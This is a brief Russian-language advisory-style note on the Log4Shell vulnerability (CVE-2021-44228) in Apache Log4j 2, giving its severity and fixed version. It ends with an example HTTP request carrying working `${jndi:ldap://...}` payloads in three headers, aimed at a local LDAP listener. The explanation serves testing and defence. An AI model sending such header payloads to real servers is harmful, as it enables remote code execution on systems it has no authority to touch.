CVE-2021-44228 (Log4Shell) — критическая уязвимость в Apache Log4j 2 (log4j-core).  
Если приложение логирует данные, которые может контролировать пользователь (например, HTTP-заголовки), то строка вида `${jndi:ldap://...}` может привести к выполнению JNDI-lookup (LDAP/RMI и др.) и в некоторых конфигурациях — к удалённому выполнению кода.

CVSS:10.0 (Critical)  
Фикс:Log4j 2.16.0 и новее


Пример сформированного запроса:
GET http://127.0.0.1:8080/
Headers:
User-Agent: ${jndi:ldap://127.0.0.1:1389/2d8167ddf9bc}
X-Api-Version: ${jndi:ldap://127.0.0.1:1389/2d8167ddf9bc}

X-Forwarded-For: ${jndi:ldap://127.0.0.1:1389/2d8167ddf9bc}
